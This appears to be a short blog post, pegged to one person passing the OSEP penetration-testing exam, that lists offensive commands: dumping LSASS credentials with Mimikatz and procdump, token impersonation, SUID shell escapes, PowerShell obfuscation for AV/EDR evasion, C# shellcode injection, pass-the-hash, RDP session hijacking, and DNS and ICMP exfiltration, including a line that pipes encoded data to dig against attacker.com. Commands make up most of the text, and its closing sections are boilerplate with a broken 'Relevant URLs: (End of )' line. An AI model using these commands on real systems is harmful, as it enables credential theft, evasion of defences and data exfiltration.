Listen to this Post

Badr Eddine Jamai’s success in passing the OSEP (Offensive Security Experienced Penetration Tester) exam highlights the importance of hands-on practice and the “Try Harder” mindset. Below, we break down key techniques, commands, and strategies to help you tackle the OSEP exam.
You Should Know: Essential OSEP Exam Techniques
1. Privilege Escalation on Windows
- Dumping LSASS for Credentials:
Using Mimikatz sekurlsa::logonpasswords Procdump (non-suspicious method) procdump.exe -ma lsass.exe lsass.dmp
- Abusing Token Impersonation:
incognito.exe list_tokens -u incognito.exe execute -c "DOMAIN\AdminUser" cmd.exe
2. Linux Privilege Escalation
- SUID Exploitation:
find / -perm -4000 -type f 2>/dev/null Exploit known binaries (e.g., find) find . -exec /bin/sh \; -quit
- Kernel Exploits:
uname -a searchsploit "Linux Kernel 5.8"
3. AV/EDR Evasion
- Obfuscating PowerShell Payloads:
Using Invoke-Obfuscation Invoke-Obfuscation -ScriptBlock {Start-Process notepad} -Command 'Token\All\1' - Shellcode Injection with C:
byte[] buf = new byte[] { 0x90, 0x90, 0xCC, 0xC3 }; // Shellcode IntPtr addr = VirtualAlloc(0, (uint)buf.Length, 0x1000, 0x40); Marshal.Copy(buf, 0, addr, buf.Length); CreateThread(0, 0, addr, 0, 0, 0);
4. Lateral Movement
- Pass-the-Hash with CrackMapExec:
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLM_HASH --local-auth
- RDP Hijacking with Shadow Attack:
tscon 2 /dest:rdp-tcp0
5. Exfiltration Techniques
- DNS Exfiltration:
Encode data and exfiltrate via DNS echo "secret" | xxd -p | tr -d '\n' | awk '{print "dig +short " $0 ".attacker.com"}' | sh - ICMP Tunneling:
sudo nping --icmp -c 1 --data-string "exfil_data" 192.168.1.100
What Undercode Say
The OSEP exam tests real-world offensive security skills, requiring deep knowledge of:
– Windows/Linux Privilege Escalation
– Custom Malware Development
– AV/EDR Bypass Techniques
– Lateral Movement & Persistence
Key Tools to Master:
- Mimikatz (Windows cred theft)
- PowerShell Empire (C2 framework)
- Metasploit Framework (Exploit dev)
- Cobalt Strike (Red Team Ops)
Expected Output:
A structured, exam-ready methodology for:
- Initial foothold → 2. Privilege escalation → 3. Lateral movement → 4. Data exfiltration.
Prediction:
As OffSec continues updating OSEP labs, expect more .NET malware evasion and cloud-based attack scenarios in future exams.
Relevant URLs:
(End of )
References:
Reported By: Badr Eddine – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


